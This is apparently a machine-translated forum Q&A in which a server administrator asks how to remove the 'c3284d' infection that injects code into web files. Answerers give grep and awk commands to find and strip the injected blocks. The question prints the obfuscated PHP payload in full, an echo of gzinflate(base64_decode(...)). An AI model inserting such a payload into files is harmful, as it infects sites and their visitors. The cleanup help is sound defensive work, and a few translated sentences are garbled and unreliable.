2

Notorious c3284d ウィルスに問題があります。見つけることができるほとんどすべての html/php/js ファイルを変更します。

サーバー上のすべてのパスワードとユーザーを変更したので、侵害されたアカウントであれば問題は解決したはずですが、完全に削除するのにまだ苦労しています。

sudo grep -R "#c3284d#" /home簡単なコマンドを使用して、すべての感染ファイルを見つけることができました。

しかし、検索して置き換える簡単な方法が必要です。

ウイルス署名は次の行です。

"#c3284d#" echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw=="))); "#/c3284d#"

エコー行が変化したり変化したりする可能性がありますが、常に で始まり で#c32..#終わり#/c3....#ます。

何もないものに置き換えたいだけです。

4

2 に答える 2

1

影響を受けるすべてのファイルを見つける簡単な方法:

grep -H -r "c3284d" /home/user

このマルウェア コードは、FTP パスワードがプレーンテキストで保存されている感染したクライアントからのものです。マルウェアは FTP ログインをスクレイピングし、ファイルへの広告コードの挿入を自動的に開始します。間違いなく完全な監査が必要ですが、運が良ければ、サーバー自体から発生したものではない可能性があります。

于 2012-09-10T12:48:04.600 に答える
1 
awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }' dirty-file > clean-file

それは一口ですが、それはトリックを行います:

$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }'
> foo
> #c3284d#
> bar
> baz
> #/c3284d#
> quux
> EOF
foo
quux
于 2012-07-15T09:24:14.017 に答える